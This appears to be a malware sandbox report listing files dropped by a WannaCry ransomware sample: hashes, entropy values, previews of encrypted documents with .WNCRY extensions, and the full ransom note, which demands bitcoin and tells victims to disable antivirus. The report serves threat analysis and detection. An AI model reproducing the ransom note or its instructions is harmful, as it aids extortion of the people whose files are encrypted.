                                Preview:WANACRY!....O./'...L8..<....P.1q.`r...[...^..T.......cp\..b3U0].b.[...@.{R.I......=Q6.w.O."\b..k.>,..UK.O.O..;...K.tt.....F,.h.f-T2rP..w?.R..\j..~..........ngr...GX..Y..8o.!..../.I.*..##z......?e...9.l....+1B.<........t'.y...>*..q...7.~=C}...o.g.#...?.gF.11+.............v.lV.GW..,_.VT..Lm?.A.tc.l..q..X...r....L.......!.3....;.a..%.M.H.........}..Z.T..3.HS....6j.{...a9...e.../........k!M......./"...S...@h...).|.....Z......V.N.........D..'.V...x...P.....B.ko-.OF.\}...V.G.,...+.n....q..#..Lqi.&../...`......Q...X.+.y.(GS.....................#.....;.{5cw..(.z.#.....4.ou......k.h.q..h.Z....O....9l.[.:Y|}.JbP..d.Cb...H.V...j.....@..s.F.`......2.f.c...J...>T{>...Jqs....9.:1,..kd0Y.,..!..............Y.jd7.P$:"....s...........Ra.....)..{d....6suC.+)G..}W{.V..EC(V..._......&9./lxJ.!{(h.N...Z.*...p.`..?i...&...0........b...&M..X...QR....-.7..+:MZ.EIE..t...Z.p.[.......M.....LP.H.]...p.o4}..Z....AN.O..+h._5Iz...c.J.T...6.l..}.V..N..v..!-.yG..Ta......s..M.m

                                C:\Users\user\Documents\SQSJKEBWDT\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Documents\SQSJKEBWDT\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Documents\SQSJKEBWDT\EFOYFBOLXA.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.833887242182343
                                Encrypted:false
                                SSDEEP:24:/XKaNYO9R5tmUhvWQBXtG4dXwu60S4dUaWxyM8zuhwLhPxzAsFw:/bNZXtmUcSX0sD60S4yNhwxxzFw
                                MD5:A6EE77B5DBAC11EF793651C54EE8341E
                                SHA1:1EAA77581080CF2263EBDDD46D481D64876CE6FA
                                SHA-256:17D80425DD178DADB9B35490039762838E0089B48944781F383D17EDCFA770F2
                                SHA-512:D819F38DC5739B7AAB85362973FAB1DB416387A9FEC535CF201A9C4650B6FBB72AE8A264D805DBE8BC4F097FB76F551898F0C77060BF79ADA52D4AD33714FD85
                                Malicious:false
                                Reputation:unknown
                                Preview:...Sq..&.=....O8...N...A...^^..k13.w..V....x.......... ..B..fu.H.....U.U..c..&...LB....9.....8.X.O.*./...7......n.....f...-G..1.o`Q.0...x...9.(._@......OU.uy......%<........t<.]j=~..Vd......p.tm..q`.j.\b.....<....|..Y.GC.P6..e.....;~.a"h4TN....N'....W...wJ.....Q.p.U}...;te....s.)_.1..-....F].\/X..]u.?j.......(.}.\I....K;.5<p\...Q[r....0z.....,.....i04=...a.....1....w..~.:4.m2.....gR.....C>a.%Et.......5U.c..=$.J.v3..\..c..:.i-m..R.....[.....)!./..Iv..NS...p..."..Y..~..|.p.IQ.h..v.a...8.z:!...uD...0......u..;...3+.%.,".#b...I.N......9......07.c..~.....t.:..W....0W....L...b.,.L34..-.P'....!U.r7.bv0."-1..N....^.pk..G.q$..`.S476.<.++.-D....Y.th..gF..e..1....VD.....F..=..Y/......1.i?p9;.*].4Z.&......,..9.{.....JFs.a...m..L.{^.m.:.b...32...C./._."..._.3..wV.jO.8H..Ry...F-..G.....$[.CEt....-~.b..@&a..MXa`P2C....6*_.......+!.J..k+..j..e........2.......D...u.Q..*-X......m.c.{.5........]+..7O.r.n..N....Kd...vh.|>..f...g.....2...?..E.yrD.3..6..b.E

                                C:\Users\user\Documents\SQSJKEBWDT\EFOYFBOLXA.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.836765864853789
                                Encrypted:false
                                SSDEEP:24:bkh/Gepq7wfVRbAOI1vXm7Gy5spbbDs6nFRoi160y2P4XeJYCpke1XA:bkh/Giq7yvbgRuGYyfDs6nFfRgOnpXA
                                MD5:34FF5B592E2C55A9C033EEB468D08E08
                                SHA1:89441AB0791D80FCF0EA2965617AA391C6B4FA67
                                SHA-256:2E039609F67C992403B5CF93FE752F94572AACFF8773AB58B4B891D42939818B
                                SHA-512:06B41F636C1F3B5FFE533BA3874F2957E6DFCFA7F9387DA885F484665555BEA96FF164FE5136F1F27E31AB968890C3DC0F4BEABD11769679368B4F2DCE6F7659
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......+4&...b..r.=G%..I.1R...Z.&.dq.l.T.7..].rM.. .F....CAnN1..d..v..........)v....RZ%.,.8......o..D..>......r...m.....j/.<..E...3.............<k.3....,..7..*.,d.@.......D.)......L...g..ZT...;.O[~O-o.{.wew........XL....@...X...{..x.i.7.......C....................xD..w...H....1......c..=X0^</.....]G.........U.....ydB..g..i.sUI.1.....}....=..q....eh..6._.gO...9.y..>..V....4.....|..A.O...F..1-..~.W..fKw...5..jwb.f.].WePJS...3.T9$$...B[7X.........I..*...b...I.e...H...^.K3`9_......@.w...G.n.&.Q6...(.`!&@....vll...' ....B...2..n...l.E....wLZ...(.*#+l.......3..v.J....s[..".!.X.80I.8^.(.~Ul......pt.fU.Dc..."./.I..-....5..(..f..-B...; ...}99...fo..,..ss%..D..B:h!S.yi........@j......rP."....[S;.rS.....sI.,....W.9..>....+<..k.|.....7...>d..P|.>.]Y_....*.xJ.p...".5..]1,. z.T....G.O.yA..G.. (..O.....tV..B.....tC@.e....DW....:.x\.P9u.SIQ*44b.m%.-....*1...J..@Wy.9..u)./!l=..9v..'.sb..*.W!t;...Dt.y..,Du.,..sG..p.3M.u...)..;....7.&.%..d.=..J*.S...<cD.....

                                C:\Users\user\Documents\SQSJKEBWDT\EFOYFBOLXA.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.836765864853789
                                Encrypted:false
                                SSDEEP:24:bkh/Gepq7wfVRbAOI1vXm7Gy5spbbDs6nFRoi160y2P4XeJYCpke1XA:bkh/Giq7yvbgRuGYyfDs6nFfRgOnpXA
                                MD5:34FF5B592E2C55A9C033EEB468D08E08
                                SHA1:89441AB0791D80FCF0EA2965617AA391C6B4FA67
                                SHA-256:2E039609F67C992403B5CF93FE752F94572AACFF8773AB58B4B891D42939818B
                                SHA-512:06B41F636C1F3B5FFE533BA3874F2957E6DFCFA7F9387DA885F484665555BEA96FF164FE5136F1F27E31AB968890C3DC0F4BEABD11769679368B4F2DCE6F7659
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......+4&...b..r.=G%..I.1R...Z.&.dq.l.T.7..].rM.. .F....CAnN1..d..v..........)v....RZ%.,.8......o..D..>......r...m.....j/.<..E...3.............<k.3....,..7..*.,d.@.......D.)......L...g..ZT...;.O[~O-o.{.wew........XL....@...X...{..x.i.7.......C....................xD..w...H....1......c..=X0^</.....]G.........U.....ydB..g..i.sUI.1.....}....=..q....eh..6._.gO...9.y..>..V....4.....|..A.O...F..1-..~.W..fKw...5..jwb.f.].WePJS...3.T9$$...B[7X.........I..*...b...I.e...H...^.K3`9_......@.w...G.n.&.Q6...(.`!&@....vll...' ....B...2..n...l.E....wLZ...(.*#+l.......3..v.J....s[..".!.X.80I.8^.(.~Ul......pt.fU.Dc..."./.I..-....5..(..f..-B...; ...}99...fo..,..ss%..D..B:h!S.yi........@j......rP."....[S;.rS.....sI.,....W.9..>....+<..k.|.....7...>d..P|.>.]Y_....*.xJ.p...".5..]1,. z.T....G.O.yA..G.. (..O.....tV..B.....tC@.e....DW....:.x\.P9u.SIQ*44b.m%.-....*1...J..@Wy.9..u)./!l=..9v..'.sb..*.W!t;...Dt.y..,Du.,..sG..p.3M.u...)..;....7.&.%..d.=..J*.S...<cD.....

                                C:\Users\user\Documents\SQSJKEBWDT\GIGIYTFFYT.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.811179423008834
                                Encrypted:false
                                SSDEEP:24:RiAOXebtyU4Sr3tDECOeMHtsXvaYJKBVasMJ4YGFPjqh:RVDbtvDBKeMHtkiYJ0TYQj2
                                MD5:80B7F146405BDE958A0118421809840A
                                SHA1:F9A740FFFFFDB94A8DDAB5F434457B5A07A3A2BE
                                SHA-256:489400DB440459DA81B1C2C0CB0D0E6AE4F620FA8625B374D00728A71C6686E7
                                SHA-512:A32FC3B3868A0A5EC4027E40918FF352090CD40FA1CBD7EAEF2DA96A494D60DD8A58B34D56A57D8388B427077F32AE1EBFE162808508647C8594E15C7211B9EB
                                Malicious:false
                                Reputation:unknown
                                Preview:...F..`d...._.s......~."..I..8.m\...m..l..........y.?.6V.(spP<..*...*...$..?.R...4l,\..#...csJ..*Qg.\B..."7.S.s...XF+/!U.1<...W..!.)m@.....;C...c.f.n...{Zo.2a.#.WT.....l.Z.~.......F..-......d.;Z...5j.}..E...:..G.......1|s.G9...a..HLCF}l...]...N.1)ki......r ......E.h..te..4..Z..&z.......E.MA..1.g.....B.F.1.`o..&...n./..L.-..k...8X.\......N....8-.....:/M5b}.r.R.f.N?..8.zr...v:y.._3.....'y....J.=...f.Z..A#.Nuj...g.YV:.....P.......).L....J...c06....W.)9;?.._.-dm...wQC..'..."q..l........3h.t.c.2X.s.qyb..uG..../5D&..~.gJ.....U{...[....:.y.~..)ko.s5......Y...4.. \';;*..i.B....Ll.0..#j..n......%.M...._..oY..j..B..:.T....F9B]..T_'.q..n.....^j...v...nG)..^......0.F.'*"..]..Y...m.....n.D[.9...b2._n....(.Bp[<.^PO.(2E.....x....y..:.Q.5_.....m."~.<...t.E..T.)+."...d...eOA}s.}..(.....J.S.E.f.w....b..m......yA...r--......LH.{.bW._......O."N.:..nZg..........%.q3..e.7..|.:....3....y...ug..3._..0.%$K.pU...C.e._.wi.*..}......%..>\.....w..G.J.X...U. E4..e...

                                C:\Users\user\Documents\SQSJKEBWDT\GIGIYTFFYT.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846474321136854
                                Encrypted:false
                                SSDEEP:24:bkwljmqLSAYSr+YFF/Ov5xrc2oG3pscmWfFrX9U4J2UYIJjV/hdLsZBnIUrI4:bkqkFSFfW/rRoG56WpuKzVsZqUrz
                                MD5:5E948845A4A605F8F7A70F6E1FB3351C
                                SHA1:0281FDB02F96512D69327624AB9711928356B91A
                                SHA-256:CCCFEA5B1664B574C55259FA542F19552BF75D8C2722014B2C5C47C687645D3A
                                SHA-512:4D01EC4139CBB15EDCFCCAD03584A517338731791F39DB0B40EDA3BE1D0084CA49F9501FBE4B20C8197179C33D7D2F025A08E5A655B369ED4A18FFCEDD681807
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....[.x......J..S.L..>..R?.".s......ih..H.D$.]....6[1w=.q..3l...J#...%..*.....s+..b~...6.vyD..oK.k..;Z.)..5...O7s.z|@~.>.....@4R..\A.^..F......<.#..y.....}.... .>.T.......c..m.#...1O.@..+NKJ..Q9.x..V...b.....^......tX#j?...\....I.C..q..EP.....{............8.{....Y.p.D.O)..>v..l...........oo#M..,.+.C....N].J!f.t....L..\.l]Y..A..{O../[.%........=.....G..6o.&5i3...d:..S2c%.0i...N......6>.{`..Q+......\ujuR.p4.......(N..l....N.............*...{'.g(..........._/..[.9.q....9l..]9{o.wU6......DZ...$R..j.Z..T.k=.e.....u.>....,.../.....t.....!X)na.L..u..)i0..bi....^.3.Q.s.R..\r}B....A.&oX.).qU...`_r...B..6..;.n.@.V.Y.Y...\tZb..%.-}....+.B.......x-\..4.-.....#[.c.v..]C.Pu..?.-..av.:..6..+.(O..q=......}.o..*..G.D.na,.L....nrd...`z[]y.;$........&4..X....x.V&0.Vd....L(tt=..$5.{9K...n.bz.R..).JL...D.74..F..^R]......)..1I.....F...}=..M}UO...{....W..I>..P..5...."<H..E.p..4...gJ.8....%..'..j.f.:.....#.k...Vct..,.@n....r}........e....Z.....R~......

                                C:\Users\user\Documents\SQSJKEBWDT\GIGIYTFFYT.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846474321136854
                                Encrypted:false
                                SSDEEP:24:bkwljmqLSAYSr+YFF/Ov5xrc2oG3pscmWfFrX9U4J2UYIJjV/hdLsZBnIUrI4:bkqkFSFfW/rRoG56WpuKzVsZqUrz
                                MD5:5E948845A4A605F8F7A70F6E1FB3351C
                                SHA1:0281FDB02F96512D69327624AB9711928356B91A
                                SHA-256:CCCFEA5B1664B574C55259FA542F19552BF75D8C2722014B2C5C47C687645D3A
                                SHA-512:4D01EC4139CBB15EDCFCCAD03584A517338731791F39DB0B40EDA3BE1D0084CA49F9501FBE4B20C8197179C33D7D2F025A08E5A655B369ED4A18FFCEDD681807
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....[.x......J..S.L..>..R?.".s......ih..H.D$.]....6[1w=.q..3l...J#...%..*.....s+..b~...6.vyD..oK.k..;Z.)..5...O7s.z|@~.>.....@4R..\A.^..F......<.#..y.....}.... .>.T.......c..m.#...1O.@..+NKJ..Q9.x..V...b.....^......tX#j?...\....I.C..q..EP.....{............8.{....Y.p.D.O)..>v..l...........oo#M..,.+.C....N].J!f.t....L..\.l]Y..A..{O../[.%........=.....G..6o.&5i3...d:..S2c%.0i...N......6>.{`..Q+......\ujuR.p4.......(N..l....N.............*...{'.g(..........._/..[.9.q....9l..]9{o.wU6......DZ...$R..j.Z..T.k=.e.....u.>....,.../.....t.....!X)na.L..u..)i0..bi....^.3.Q.s.R..\r}B....A.&oX.).qU...`_r...B..6..;.n.@.V.Y.Y...\tZb..%.-}....+.B.......x-\..4.-.....#[.c.v..]C.Pu..?.-..av.:..6..+.(O..q=......}.o..*..G.D.na,.L....nrd...`z[]y.;$........&4..X....x.V&0.Vd....L(tt=..$5.{9K...n.bz.R..).JL...D.74..F..^R]......)..1I.....F...}=..M}UO...{....W..I>..P..5...."<H..E.p..4...gJ.8....%..'..j.f.:.....#.k...Vct..,.@n....r}........e....Z.....R~......

                                C:\Users\user\Documents\SQSJKEBWDT\JDDHMPCDUJ.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7834522779236845
                                Encrypted:false
                                SSDEEP:24:BwQ/rj0jYEh7UtD2r06bzAFnAeqnahwP7VS:SQ/r457TI6opdqCwP78
                                MD5:80D963B9CC37AB3C327BF6E628BC376E
                                SHA1:2EF8AA9A691EDBF0ADF3C6EE2E8555D478C7F6DF
                                SHA-256:F81AE5D8830FA56F477C0E89590CDDA87EB508C086FF363BBA3F84E2E8A86CD8
                                SHA-512:CAD9D9476E5348B195461156BC81A2CE5B747186EB48AA1EA82D6D9018D1B97D0BED4B5E97D0546E304668BD707598AD4FECFEB8691B0538C2EF748446CAC756
                                Malicious:false
                                Reputation:unknown
                                Preview:.8../..LR.mS?V.E|...I.(S...2.5m.D..\.l.....F.....v..L.2i$.oe...R ..n......].:h:../~f..:.L)v .(g)......+..N..<..E.B..&.>:a@......V..~.~....._..o..6.?.....M[...S..).3ij...{T.X..k..| ..p.JbS.s8...3S...uaO..PoC...Vd.b&.....H8..A.`p..69Vcv.f....j.4.guV......>D......A....|sX. ]X.2x...'..v...)....U...~...Pw..#..[E.."]m..u..c.~..]....}..s.=oz..9.v....?..X.l...)./.Q.....Z.....GbP...}....54...w....oOU..0....1V........4i....S.LY...;....u..<....>...c.3._..O....f6N.a.&s.....P..g5...|..lz]..!|/l..h...].o.n>S.a.@....>.;.t...C.@-\./s7.....x+.!Ck.._.z."6H......Ey..M.?.z..2*...W.{&.+..%1.......o.M..a!.7.........1p.8..W..IX.l3..xC......O..}...Tac_.........}.0..8..5.dq.6SXna.........../........E.......,.....<..0..._.4.m.EtqD"..........J..............n[.E|x.N......0s{VP..( L..(`!);{....Z.]...%.........^......M.25.J.}..SEFg..6..Md..3..h..p....2....X..YqP...g~..x/_)...f#..Wy......)./z.......Pu.wlc.../.h........?.e.....P...8..L.z^..u........p........e.C...i.~.q..%

                                C:\Users\user\Documents\SQSJKEBWDT\JDDHMPCDUJ.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.837536760254247
                                Encrypted:false
                                SSDEEP:24:bkrJFYRSY9SAWnqyrJqVXj6DOF1M2p99g7IJrMCxDUveWvIReSXi1eIEBJ5u3U0P:bkrJi7OsVm0g7eMC9YzvIYSy1eIEdu3H
                                MD5:AFA864B1E7A4065C0696063F90E965F7
                                SHA1:C575E9BFEB73DD25805484FC63EF157512983DDB
                                SHA-256:BFDAEC659184E67543C9C59B03ECAE29529082C47F4B9ECF034C53CC3BD3049B
                                SHA-512:8FB0DDDD4B7A63D17F5AF5E9EBC2AA59929D7A89BF22E44FFCB13E95E08EF0C48E2134B1121260D2ED21B18A25583341BA80C27508FF51BED02F0F7F233DFE6E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......w..x)f.Hrf..\..`...{.uT.... .M.Y... =J..(.....F`...x:a1t.......bs.G.a0yd.7-.D.b....^.......O~k..Er.$V.F.W.....b..$~Z[V.h..Ir.-..9^..7...\.|7^.c*Y...=.bX0.O..O5.PW._.M..d......VA.Y.mN....8fe....6...l.~.y..v .7......-...#.KK.Q.#...}..fQr+oE<.............l...}..0.]68)P...d..;9..$.........h.V.gy..%).DF?C?P.I..5....MV.B.Z...v..3Q...........H.z.2.2SdK...V'Of...I......Y..W..-JJ...U..p.k..7..".>........By&.d5.ea8n.X.1.?..'H.._h\..B.^P..........Cq.8.{o..9..o:..z..Q.....#.a.N...(.&......y.P=.b4...8......-............).*.SD.q^..F...M..'.].e..tM.B6....N....'...q......WXr.c.^..XL.S2.@..^...@T....8..w.....f...g..X..+.S ..T..r....'..}...O($.C|..v._nu..>h]~..87Yk.j...,..Uw...;..V.....N)..}..@.._e.qJ............"M.AKF..l?.$[..1:._......Kh...Q@.p=XfI.NUy..,w.qm.....+.E...3..h......d<.[.Ybd........\F..X...9..^~U`w.7*....w0.v."y......'.....)..!...H.F_6^.*..CW^...E7.q..'X}.P..E*|..$.\.,...e.~..W.#.n.+o..D.j...I..SC..|.6..2ZU.f..B.....

                                C:\Users\user\Documents\SQSJKEBWDT\JDDHMPCDUJ.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.837536760254247
                                Encrypted:false
                                SSDEEP:24:bkrJFYRSY9SAWnqyrJqVXj6DOF1M2p99g7IJrMCxDUveWvIReSXi1eIEBJ5u3U0P:bkrJi7OsVm0g7eMC9YzvIYSy1eIEdu3H
                                MD5:AFA864B1E7A4065C0696063F90E965F7
                                SHA1:C575E9BFEB73DD25805484FC63EF157512983DDB
                                SHA-256:BFDAEC659184E67543C9C59B03ECAE29529082C47F4B9ECF034C53CC3BD3049B
                                SHA-512:8FB0DDDD4B7A63D17F5AF5E9EBC2AA59929D7A89BF22E44FFCB13E95E08EF0C48E2134B1121260D2ED21B18A25583341BA80C27508FF51BED02F0F7F233DFE6E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......w..x)f.Hrf..\..`...{.uT.... .M.Y... =J..(.....F`...x:a1t.......bs.G.a0yd.7-.D.b....^.......O~k..Er.$V.F.W.....b..$~Z[V.h..Ir.-..9^..7...\.|7^.c*Y...=.bX0.O..O5.PW._.M..d......VA.Y.mN....8fe....6...l.~.y..v .7......-...#.KK.Q.#...}..fQr+oE<.............l...}..0.]68)P...d..;9..$.........h.V.gy..%).DF?C?P.I..5....MV.B.Z...v..3Q...........H.z.2.2SdK...V'Of...I......Y..W..-JJ...U..p.k..7..".>........By&.d5.ea8n.X.1.?..'H.._h\..B.^P..........Cq.8.{o..9..o:..z..Q.....#.a.N...(.&......y.P=.b4...8......-............).*.SD.q^..F...M..'.].e..tM.B6....N....'...q......WXr.c.^..XL.S2.@..^...@T....8..w.....f...g..X..+.S ..T..r....'..}...O($.C|..v._nu..>h]~..87Yk.j...,..Uw...;..V.....N)..}..@.._e.qJ............"M.AKF..l?.$[..1:._......Kh...Q@.p=XfI.NUy..,w.qm.....+.E...3..h......d<.[.Ybd........\F..X...9..^~U`w.7*....w0.v."y......'.....)..!...H.F_6^.*..CW^...E7.q..'X}.P..E*|..$.\.,...e.~..W.#.n.+o..D.j...I..SC..|.6..2ZU.f..B.....

                                C:\Users\user\Documents\SQSJKEBWDT\PALRGUCVEH.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.815526355214315
                                Encrypted:false
                                SSDEEP:24:4dnPyi8yd8QaQAD8M6f1YMUW82TXuxbCkL22aLcM9WjSfe9uCwJc:4dnbv3ADBWYBW82Lg4LcMMjwqL
                                MD5:3D699AD7CCD36C3BE0462054F28EC331
                                SHA1:C0BCAFDE74D16836C268FC5CF0D21114108E2BF4
                                SHA-256:9B6F2187E2D9BF0740597CCF6F4DC387B6C6576147D1185B9DEC2C83CC062B3D
                                SHA-512:B169AE8775265ABA97941812DC7907C15A6E73B1B38B7A3E804F5E2F32D122E4204BD97F1E781D309F33C6533C0D58C323407CD1DCE5FD1FDE99C0E79BDF43D7
                                Malicious:false
                                Reputation:unknown
                                Preview:C....[<Em".].m;6.0.....X..w:q.....S..3B...2........E.R.Px.E..TPh.."L....j..}q.k.F.JoA>;.....<..]%S...?%..&.7K.X.@..W.rU...#G.eu.@...Q.aI-K/.f.....+'......(..H..BS...a..P.T...jk...c..j..pf..^4.......Gnh.G.V...dh.N.`.%..O..............._$...t........../..........AF?..I..b<-.A.T..........A(....B..Q...?GJ5...B....3....H.,...[..QV...\m..S.3.FC..^.....F..r.F..7..d......$w.#..3. ?......%...M.E.I..x..z.......H?.g..<..W.%g.p..$f...Q..S!.1 ...Pr....BBH.`gB W.#.C..A3...]?.by..Olh1r.G..i...UY.i3.w.6.+.5..q......z..<..0. s..s.*.4...h {KG.0.F._...>#.J..t....Q.\..Dq.c~.Q...R...w.%..3..k.fZ....P;@Y..u..:...H..."...X......i{...l..OJ.9..).W.?.92A.......R.d.{2NC....lS.d..x...Wm........u.....>..b....e....7.]qS....^Jvv.U.......ZS..F.........4<Q[.9-.E$.J...T@i..............?V..#..U.Sv`.[JT...3..I...t...9b.f..p.h.G..'....L..........SJ`..:%s.C....4.E..>...p.[S..e.k..].1.V.......... .q.&.|.Y.Jl~..r...iE.v.m.?..@.|.....c.e...":}6...u..R.....m0.z..`......q....

                                C:\Users\user\Documents\SQSJKEBWDT\PALRGUCVEH.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8380556862283
                                Encrypted:false
                                SSDEEP:24:bkDBzyQrw5hSiFUAfOO6SDjzMg7XLSlBSYnuseqQ00YfCyhuysHyxSLoAg6:bk9EjSiXGpSDjIaLEcYuGwvyxSRg6
                                MD5:6E28E747C521ABDAF4DAAB0973728E2C
                                SHA1:547A815AD984B7E28CACFBEEF0A8B927523E04DF
                                SHA-256:51DD50E3AA18BB0C878AA110459CED870B7D2A7A6D42B9CADC364E4DF81B9C53
                                SHA-512:192491EF8E5B36431B65F674AB6811570A3026024CFFD5CD8D252384122C18DADB1038307FF8A65B91BE255E4EA09A64EBF27BA955D61350D591080252710516
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....M......k.i.xQ>..>8..t. .j...^.y|W..4..7...R..S.....#.s.|.2].4..'..............MI.`..2......^.y....h#......n--'/|T.]j)...*.YO.O.&q^?fa.9..C..^.l..+.kI.r...Y.....}*......v#.v.>h0..z.D..]2.e....HY..0#l...g....U.3...g.f!L..Jw.........p.+.x...'.W.............=.I.........`2.Cq.'..-|.0.I.kV....=.:b0S.dF.....?....][.lEY.*...MU..:..8.....2A~H..+@.<.)..F-.{..F.\..Z.N.|..v...b|..j.uy....,.....W.}.h}.......,.c...S..m........G!..(2...8..q..M.%.x..uS.G...m.U..t..s.H..U9.ksC8c.7I.J...........].b..w.........O......5..v....I...........|wJ.+To...TC..B..]*..{.XFz....k......v./.[B..wR.C"}2.,....Go,t^A..|..l"S..~V.WUa.u.oU......Yc..Fc....C"....b...CX...F...6+V6.........sw.C.c.eB.....`j....j.3FW..%.g.X....P....0..gh..3..Z5...ole.8G.)..lY..b...w.........[A..39U.[.....Z.oe.w....'..kH.jz\(.Q..8.....;;.\V.g.s..CDv..g.._?AK|8..6......Q!.......Ca.v..,v=...~n .x.H.@Y..+....R...$'wC..-8...).................7...U....qI.`.D<..&e..U..F..Q=...P.{s...$.H{

                                C:\Users\user\Documents\SQSJKEBWDT\PALRGUCVEH.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8380556862283
                                Encrypted:false
                                SSDEEP:24:bkDBzyQrw5hSiFUAfOO6SDjzMg7XLSlBSYnuseqQ00YfCyhuysHyxSLoAg6:bk9EjSiXGpSDjIaLEcYuGwvyxSRg6
                                MD5:6E28E747C521ABDAF4DAAB0973728E2C
                                SHA1:547A815AD984B7E28CACFBEEF0A8B927523E04DF
                                SHA-256:51DD50E3AA18BB0C878AA110459CED870B7D2A7A6D42B9CADC364E4DF81B9C53
                                SHA-512:192491EF8E5B36431B65F674AB6811570A3026024CFFD5CD8D252384122C18DADB1038307FF8A65B91BE255E4EA09A64EBF27BA955D61350D591080252710516
                                Malicious:false
                                Reputation:unknown
